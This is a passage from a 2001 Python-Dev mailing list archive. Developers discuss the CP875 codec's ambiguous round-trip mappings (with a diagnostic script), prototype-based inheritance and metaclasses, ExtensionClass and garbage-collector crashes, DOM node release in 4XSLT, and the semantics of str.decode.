	0x00e1: 0x001a,	# SUBSTITUTE
	0x00ec: 0x001a,	# SUBSTITUTE
	0x00ed: 0x001a,	# SUBSTITUTE
	0x00fc: 0x001a,	# SUBSTITUTE
	0x00fd: 0x001a,	# SUBSTITUTE

Therefore what appears associated with 0x1a in the derived encoding_map
dict:

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
so happened to map back to 0x3f before, but to 0xfd after the dict change,
so "?" doesn't survive the round trip anymore.

My knowledge of encoding internals is exceeded only by my mastery of file
URLs under Windows <wink>, so I could sure use some help getting this
repaired.  I'd really like to check in the dict improvement (+ test
repairs), but won't do it so long as it makes a std test fail.  If, e.g.,
you're *relying* on "the first" of a set of ambiguous reverse mappings
winning the game, then iterating over decoding_map.items() in reverse sorted
order would do the trick reliablly.  But I don't know whether the ambiguity
in cp875 is a bug or an undocumented feature ...

7-bit-ascii-looks-better-every-day<wink>-ly y'rs  - tim


(*) Simply by taking the damn "~" off "~hash" -- I explained quite a while
ago why that can lead to a weak form of clustering "in theory", and
instrumenting the dict lookup code confirmed that it does hurt in real life.


From guido@digicool.com  Sat May 12 13:28:23 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 07:28:23 -0500
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400."
 <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>
References: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>
Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>

Do prototype-based language have the equivalence of multiple
inheritance?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim_one@email.msn.com  Sat May 12 13:16:33 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 08:16:33 -0400
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>

[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?

Just as for class-based languages, whether a prototype-based language
supports an MI workalike varies by language.  In a class-based language with
MI, a class can have multiple base classes; in a prototype-based language
with an MI workalike, an object can have multiple prototype objects.  The
same kinds of ambiguities can arise, and the same kinds of resolution
strategies are applicable (imposed linearization; user-supplied
qualification; user-supplied renaming; guessing <0.7 wink>).

JavaScript is the best-known prototype language that does not support
multiple prototypes per object.  A very readable intro to its object model
is here:

  http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf

It's interesting because, near the end, the author explores a bit how far
you can get *trying* to fake MI in JS.  The answer is "farther than you
might think", but not all the way.


From fredrik@pythonware.com  Sat May 12 13:25:43 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 14:25:43 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid>

tim wrote:
> If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings
> winning the game, then iterating over decoding_map.items() in reverse sorted
> order would do the trick reliably.

reverse sorting makes sense to me.  but the cp-files appear to be
machine generated, so patching that python file won't help.

> But I don't know whether the ambiguity in cp875 is a bug or an undocumented
> feature ...

a truly future-proof solution would be to specify exactly how to resolve
every many-to-one mapping, for every font having that problem.  but
sorting them is clearly better than relying on implementation-dependent
behaviour...

(is Jython using exactly the same hashing and dictionary algorithms as
CPython?  or does it work by accident also under Jython?)

Cheers /F


From nas@python.ca  Sat May 12 15:28:54 2001
From: nas@python.ca (Neil Schemenauer)
Date: Sat, 12 May 2001 07:28:54 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <20010512072854.A4271@glacier.fnational.com>

--HlL+5n6rz5pIUxbD
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

skip@pobox.com wrote:
>=20
> Has anyone investigated interactions between ExtensionClass objects and G=
C?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.

Do any of the PyGtk objects define the GC type flag?

The GC is fairly good a exposing memory management bugs that
otherwise go unnoticed.  If you're using glib you can try setting
the MALLOC_CHECK_ environment variable to 2.  If you've got lots
of memory you could also try using electric fence and running
your program.  Finally, you might try compiling with Py_DEBUG
set.

> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

I'd be willing to take a look (the chances of me reproducing it
don't look good).  A public RSA key is attached.

  Neil

1024 35 1372392199657274371686721919189033793743756930167147933612297754126=
598259273931615299793939606535704607722644783446173838392284136573447881967=
319012596588320802053877521752598768614155667872751121516571978298556660249=
308172933987227071278497487693980378602960539924485391548971170156265529348=
77126704135564999 nas


--HlL+5n6rz5pIUxbD
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAjr9SKYACgkQIyPjKbgF8jfQxQCfbIUUgut9FXK2qCF8+bPQc7G+
ktAAn0nJExCgF3/4fftE+4yWwD74cc1f
=Tt/R
-----END PGP SIGNATURE-----

--HlL+5n6rz5pIUxbD--


From sdm7g@Virginia.EDU  Sat May 12 16:07:06 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 11:07:06 -0400 (EDT)
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>
Message-ID: <Pine.NXT.4.21.0105121011450.241-100000@localhost>


[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?
 
Yeah ... What Tim said... 

Also: There are two basic implementation models:

Delegation  [a.k.a. "Lifetime sharing", cloning]
  sort of like python -- if you don't know how to handle it "ask" 
  a parent object. ( "ask" in quotes, because I've recently been
  in a long argument about whether objective-C & smalltalk can
  really be said to "send messages" , or if it's "just" dynamic
  lookup and function application! ) 

Extension  [a.k.a. "Birth sharing", copying, concatenation ]
  more like how I imaging C++ vtables are built -- the python 
  equivalent would be like merging all of the class __dict__'s
  together with name-clase priority going to the nearest
  relative. 

( "Life Sharing" vs. "Birth Sharing" -- is a change in the
  base class after object creation inherited by the object? )

 I think most Multiple-Inheritance languages use delegation, but
no reason it won't work in extension. The diff is that in extension,
everything has to get resolved at object creation. 
 Extension could be made more flexible if on creation, you could 
not only add new methods, but rearrange and control the extension
process ( sort of like "from xxx import yyy; from aaa import bbb" ).
 I would think one could use delegation by default, but provide 
an extension mechanism as an optimization, but I don't know if 
there's any system that does this. 

 If it follows the paradigm, a prototype system doesn't have an 
'isa' or '__class__' slot -- only a (linked) list of parent objects.
But if you were simulating class orientation, one would add 
an 'isa' slot for the immediate prototype, and probably enforce
some restrictions on the prototype objects that were playing the
role of class objects. 

 "If it follow the paradigm" -- as in OO in general, there are
several flavors and implementations and some are may be  hybrid
systems. 
  Self is the language most widely known as a prototype based 
language: some others: Newtonscript (from apple's late lamented
Newton palmtop), Kevo (a forth based o-o language), Cardelli's
Obliqu (This didn't stick in my mind from when I read the papers
back in the "safe python" development days, but it's listed in
my book.) as well as XlispStat's object system. (which isn't 
listed in that book but there is an ObjectLisp -- I don't know
if they were at all related. ) -- and Tim said JavaScript. 
The Amulet and Garnet GUI systems are prototype based -- Garnet
written in Lisp and Amulet in C++. 

 For NewtonScript, Kevo, and maybe JavaScript, I suspect the
simplicity of the system was a motivation. 
 
("the book" I'm reading is "Prototype-Based Programming -- Concepts,
Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan
Moore, pub. Springer. A collection of papers, some of which are 
available on the Web -- I know the Self papers, one description of
NewtonScript, and one or two articles on Kevo are online, as well
as Cardelli's Obliq paper. )


-- "Steve" Majewski


From martin@loewis.home.cs.tu-berlin.de  Sat May 12 20:16:58 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 21:16:58 +0200
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>

> Has anyone investigated interactions between ExtensionClass objects
> and GC?

At some point, extension classes used a literal copy of
PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
and only had the spare fields that were expected then. Today,
PyTypeObject has much more fields, so extension objects produce random
errors (eg. with GC) when used in a modern interpreter (where the copy
has not been synchronized). Whatever immediately follows the type
object in memory may be interpreted as GC flag.

Regards,
Martin


From guido@digicool.com  Sat May 12 22:08:05 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:08:05 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200."
 <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com>

> At some point, extension classes used a literal copy of
> PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
> and only had the spare fields that were expected then. Today,
> PyTypeObject has much more fields, so extension objects produce random
> errors (eg. with GC) when used in a modern interpreter (where the copy
> has not been synchronized). Whatever immediately follows the type
> object in memory may be interpreted as GC flag.

Not quite true.  ExtensionClasses (at least recent versions that
worked with 1.5.2) contain a copy of the type object up to and
including the tp_flags field, and the 2.1 code is careful not to use
any newer fields without first checking the corresponding flag bit.

Now, if you are using the 1.4 version of ExtensionClasses you might
not have the tp_flags field either (I don't know, I can't easily
check) but the 1.5.2-compatible version of ExtensionClasses doesn't
even require recompilation to work with Python 2.1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Sat May 12 21:12:39 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 22:12:39 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>

> But I don't know whether the ambiguity in cp875 is a bug or an
> undocumented feature

The official (as in "as official as it gets") mapping between CP 875
and Unicode is at

http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT

This is also the file which served as an input to generate cp875.py.

Character 1A, which is the mapping result of these characters, is
indeed known with the name "SUBSTITUTE", apparently following the
definition in

http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm

# substitute character (SUB): A control character that is used in the
# place of a character that is recognized to be invalid or in error or
# that cannot be represented on a given device.

That would suggest that these characters in EBCDIC 875 do not have
equivalents in Unicode. However,

http://www.kostis.net/charsets/ebc875.htm

suggests that the characters in question (3F, DC, E1, EC, ED, FC, and
FD) have no character meaning at all.

It seems that IBM's ICU library also maps U+001A to character 3F, see

http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup

It appears, from looking at

http://www.natural-innovations.com/boo/asciiebcdic.html

that byte 3F *is* the substitution character in EBCDIC. So it is a bug
in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC
character which is mapped to SUBSTITUTE; I think cp875 should be
corrected to always map U+001A to 3F. That is not something the
generator can currently do, though.

So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the
   test (although when looking at the first 128 characters only, it
   is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that
   apparently these characters have no meaning in that code page.
   Unfortunately, I could not find any official IBM documentation
   page that lists the characters supported in each of the EBCDIC
   code pages.

The second seems to be more corrrect to me, although it is a deviation
from the Unicode consortium publications.

Regards,
Martin


From guido@digicool.com  Sat May 12 22:21:21 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:21:21 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400."
 <Pine.NXT.4.21.0105121011450.241-100000@localhost>
References: <Pine.NXT.4.21.0105121011450.241-100000@localhost>
Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>

> Also: There are two basic implementation models:
> 
> Delegation  [a.k.a. "Lifetime sharing", cloning]
>   sort of like python -- if you don't know how to handle it "ask" 
>   a parent object. ( "ask" in quotes, because I've recently been
>   in a long argument about whether objective-C & smalltalk can
>   really be said to "send messages" , or if it's "just" dynamic
>   lookup and function application! ) 
> 
> Extension  [a.k.a. "Birth sharing", copying, concatenation ]
>   more like how I imaging C++ vtables are built -- the python 
>   equivalent would be like merging all of the class __dict__'s
>   together with name-clase priority going to the nearest
>   relative. 
> 
> ( "Life Sharing" vs. "Birth Sharing" -- is a change in the
>   base class after object creation inherited by the object? )

Interesting.  So is the rest of this thread, but since Python is not a
prototype language and is unlikely to become one, I'd like to mention
that Python 2.2 will likely allow you to choose either paradigm, on a
per-class basis, using metaclasses.

I'm finding metaclasses in Python useful for different things than
they are in Smalltalk, and I expect that they will continue to play a
less important role.  But they are important because they control many
"policy" aspects of Python classes/types: e.g. whether instances have
a __dict__ or a specific set of slots (maybe even typed slots),
whether changes can be made to a class after it's been created, the
semantics of multiple inheritance, and so on.

Right now, my metaclasses continue to be implemented in C, although I
expect that eventually they will be subclassable in Python.  Watch the
descr-branch in the CS tree.  I hope I'll soon have some time to write
a PEP, too.

It's an interesting journey!  The book I am reading about this:
"Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
http://cseng.awl.com/book/0,3828,0201433052,00.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g@Virginia.EDU  Sat May 12 21:53:26 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 16:53:26 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105121640050.261-100000@localhost>


On Sat, 12 May 2001, Guido van Rossum wrote:

> Interesting.  So is the rest of this thread, but since Python is not a
> prototype language and is unlikely to become one, I'd like to mention
> that Python 2.2 will likely allow you to choose either paradigm, on a
> per-class basis, using metaclasses.

 As I said earlier: the only advantage would be if it could simplify 
things "under the hood" (compared to metaclasses) but could still 
provide the same Class semantics (with maybe a "proto" declaration
sneaking it's nose in under the tent.) 
 But I have no immediate idea on how to do that, and it sounds like
you're pretty far along into an implementation already. 

> I'm finding metaclasses in Python useful for different things than
> they are in Smalltalk, and I expect that they will continue to play a
> less important role.  But they are important because they control many
> "policy" aspects of Python classes/types: e.g. whether instances have
> a __dict__ or a specific set of slots (maybe even typed slots),
> whether changes can be made to a class after it's been created, the
> semantics of multiple inheritance, and so on.

 I guess my practical quesion, which I meant to ask before I got
myself sidetracked into preaching prototypes is: How much of the
existing plumbing (specifically the Don Beaudry hack) can I rely
on in the future for the objective-C/python bridge ? 
 With BOOST and Zope's extension classes relying on it, can I 
assume that it's being extended rather than replaced ? 
( I guess I ought to take a look at the code! ) 

> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

Thanks for the reference. 
Talking about interesting journies: 

 Guido: did you ever imagine back at that first workshop at NIST
that you and Python would be where you are today ? 


-- Steve Majewski 


From gmcm@hypernet.com  Sat May 12 22:09:41 2001
From: gmcm@hypernet.com (Gordon McMillan)
Date: Sat, 12 May 2001 17:09:41 -0400
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
References: Your message of "Sat, 12 May 2001 11:07:06 -0400."             <Pine.NXT.4.21.0105121011450.241-100000@localhost>
Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost>

[Guido]
> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

The two things that struck me most when I read that last year:
 
 - How eminently ill-suited C++ is for this stuff (the book 
develops a framework in C++)

 - a very convincing argument that if you derive C from A and B 
(whose metaclasses are not the same), the system must 
derive a metaclass for C, using MI from A and B's 
metaclasses.

duct-tape-skull-cap-advised-ly y'rs

- Gordon


From tim.one@home.com  Sat May 12 22:22:49 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 12 May 2001 17:22:49 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMNKBAA.tim.one@home.com>

[/F]
> reverse sorting makes sense to me.  but the cp-files appear to be
> machine generated, so patching that python file won't help.

Agreed.

> a truly future-proof solution would be to specify exactly how to
> resolve every many-to-one mapping, for every font having that
> problem.  but sorting them is clearly better than relying on
> implementation-dependent behaviour...

The attached program suggests the problem is rare; of those encoding files
that have a Python decode_map dict, only these triggered a meaningful
ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875
is the only one that *can* fail (the ambiguities in cp1006 are for points >
0x7f, so aren't tested here).

Hmm!  Now I see that in a part of test_unicode that wasn't reached, cp875 and
cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128)
roundtrip test too.

> (is Jython using exactly the same hashing and dictionary algorithms as
> CPython?  or does it work by accident also under Jython?)

Sorry, no idea.  Attempting to browse the Jython source on SourceForge caused
this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php<wink>-ly y'rs  - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items()
                         if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."


From tim.one@home.com  Sat May 12 22:48:38 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 12 May 2001 17:48:38 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOENCKBAA.tim.one@home.com>

[Martin v. Loewis, whose encyclopedic knowledge of encoding details
 still isn't enough to get a clear answer (it's like somebody asking
 me for a simple answer to a floating point question <wink>]

> ...
> So I think we can take one of two approaches:
>
> 1. admit that CP 875 is not round-trippable, and exclude it from the
>    test (although when looking at the first 128 characters only, it
>    is round-trippable).

As I noted later, 875 is already excluded from the roundtrip test across
range(128, 256).  What it's failing is the roundtrip test across range(128):
after unicode("?", "cp875") produces u'\x1a', the following .encode('c875')
has no way to know which range the original input came from.  So it's not
really round-trippable across range(128) either unless more info is given to
.encode().

> 2. remove the SUBSTITUTE mappings from CP875, acknowledging that
>    apparently these characters have no meaning in that code page.
>    Unfortunately, I could not find any official IBM documentation
>    page that lists the characters supported in each of the EBCDIC
>    code pages.
>
> The second seems to be more corrrect to me, although it is a deviation
> from the Unicode consortium publications.

Until you and MAL agree on the best thing to do (I have no opinion:  my only
exposure to Unicode in daily programming life remains the Python test suite),
I'm going to opt for #1:  as cp875.py stands today, it's simply a fact that
it's not round-trippable across any range including 0x3f.


From martin@loewis.home.cs.tu-berlin.de  Sat May 12 23:32:10 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 00:32:10 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message
 from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>

> Now, if you are using the 1.4 version of ExtensionClasses you might
> not have the tp_flags field either (I don't know, I can't easily
> check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> even require recompilation to work with Python 2.1.

I'll attach a copy below of the struct as defined in
pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension
classes). As you can see, it does not provide tp_flags, but has a
field of tp_xxx4 for it.

That *should* work, except that it also has its 'methods' field where
tp_traverse would go, and its class_flags field where tp_clear would
go.

Now, you write

> ExtensionClasses (at least recent versions that worked with 1.5.2)
> contain a copy of the type object up to and including the tp_flags
> field, and the 2.1 code is careful not to use any newer fields
> without first checking the corresponding flag bit.

In this generality, it is apparently not true: Modules/gcmodule.c has,
in delete_garbage,

			if ((clear = op->ob_type->tp_clear) != NULL) {
...
		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
		(void) traverse(PyObject_FROM_GC(gc),
			       (visitproc)visit_decref,
			       NULL);

which does not check any flags. That still shouldn't cause any
problems, since the Gtk objects should never end up in the GC lists -
but may be I'm missing something.

Regards,
Martin

typedef struct {
	PyObject_VAR_HEAD
	char *tp_name; /* For printing */
	int tp_basicsize, tp_itemsize; /* For allocation */
	
	/* Methods to implement standard operations */
	
	destructor tp_dealloc;
	printfunc tp_print;
	getattrfunc tp_getattr;
	setattrfunc tp_setattr;
	cmpfunc tp_compare;
	reprfunc tp_repr;
	
	/* Method suites for standard classes */
	
	PyNumberMethods *tp_as_number;
	PySequenceMethods *tp_as_sequence;
	PyMappingMethods *tp_as_mapping;

	/* More standard operations (at end for binary compatibility) */

	hashfunc tp_hash;
	ternaryfunc tp_call;
	reprfunc tp_str;
	getattrofunc tp_getattro;
	setattrofunc tp_setattro;
	/* Space for future expansion */
	long tp_xxx3;
	long tp_xxx4;

	char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
	/* these must be last */
	int tp_alloc;
	int tp_free;
	int tp_maxalloc;
	struct _typeobject *tp_next;
#endif
  PyMethodChain methods;
  long class_flags;
  PyObject *class_dictionary;
  PyObject *bases;
  PyObject *reserved;
} PyExtensionClass;


From martin@loewis.home.cs.tu-berlin.de  Sun May 13 13:08:02 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 14:08:02 +0200
Subject: [Python-Dev] ReleaseNode interface in 4XSLT
Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>

Currently, 4XSLT has a dependency on the DOM implementation in terms
of memory management (among other dependencies). I'd like to reduce
this dependency, by providing a centralized function that knows how to
release nodes.

In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and
supports installations without 4Suite (i.e. without pDomlette). I've
put this into xslt/__init__.py, so that all callers of
Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
If desired, I could produce a patch against the public Ft CVS.

As a slightly independent question, such a function also ought to
support DOM implementations not known to it; I'm thinking in
particular of the Zope DOMs. I'd like to hear proposals on how such an
interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite;
   you'd need to navigate from the node to the implementation, then
   you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown
   DOMs, effectively believing in reference counting, garbage collection,
   acquisition, and other black art.

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for
   Python DOM.

Regards,
Martin


From mwh@python.net  Sun May 13 13:36:26 2001
From: mwh@python.net (Michael Hudson)
Date: 13 May 2001 13:36:26 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com>
Message-ID: <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> Fredrik Lundh wrote:
> > can you take that again?  shouldn't michael's example be
> > equivalent to:
> > 
> >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > 
> > if not, I'd argue that your "decode" design is broken, instead
> > of just buggy...
> 
> Well, it is sort of broken, I agree. The reason is that 
> PyString_Encode() and PyString_Decode() guarantee the returned
> object to be a string object. To be able to reuse Unicode codecs
> I added code which converts Unicode back to a string in case the
> codec return an Unicode object (which the .decode() method does).
> This is what's failing.

It strikes me that if someone executes

aString.decode("latin-1")

they're going to expect a unicode string.  AIUI, what's currently
happening is that the string is converted from a latin-1 8-bit string
to the 16-bit unicode string I expected and then there is an attempt
to convert it back to an 8-bit string using the default encoding.  So
if I'd done a 

sys.setdefaultencoding("latin-1")

in my sitecustomize.py, then aString.decode("latin-1") would just be
aString again?  This doesn't seem optimal.

> Perhaps I should simply remove the restriction and have both APIs
> return the codec's return object as-is ?! (I would be in favour of
> this, but I'm not sure whether this is already in use by someone...)

Are all the codecs ditributed with Python 2.1 unicode-related?  If
that's the case, PyString_Decode isn't terribly useful is it?  It
seems unlikely that it received much use.  Could be wrong of course.

OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
operation.  Do we want

open(file).read().decode("jpeg") -> some kind of PIL object

to be possible?

Cheers,
M.

-- 
  GET   *BONK*
  BACK  *BONK*
  IN    *BONK*
  THERE *BONK*             -- Naich using the troll hammer in cam.misc


From mal@lemburg.com  Sun May 13 17:53:55 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 18:53:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFEBC22.1F0AF685@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com> writes:
> 
> > Fredrik Lundh wrote:
> > > can you take that again?  shouldn't michael's example be
> > > equivalent to:
> > >
> > >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > >
> > > if not, I'd argue that your "decode" design is broken, instead
> > > of just buggy...
> >
> > Well, it is sort of broken, I agree. The reason is that
> > PyString_Encode() and PyString_Decode() guarantee the returned
> > object to be a string object. To be able to reuse Unicode codecs
> > I added code which converts Unicode back to a string in case the
> > codec return an Unicode object (which the .decode() method does).
> > This is what's failing.
> 
> It strikes me that if someone executes
> 
> aString.decode("latin-1")
> 
> they're going to expect a unicode string.  AIUI, what's currently
> happening is that the string is converted from a latin-1 8-bit string
> to the 16-bit unicode string I expected and then there is an attempt
> to convert it back to an 8-bit string using the default encoding.  So
> if I'd done a
> 
> sys.setdefaultencoding("latin-1")
> 
> in my sitecustomize.py, then aString.decode("latin-1") would just be
> aString again?  This doesn't seem optimal.

True and that's why I am proposing to losen the restriction 
on having the two APIs returning strings only.
 
> > Perhaps I should simply remove the restriction and have both APIs
> > return the codec's return object as-is ?! (I would be in favour of
> > this, but I'm not sure whether this is already in use by someone...)
> 
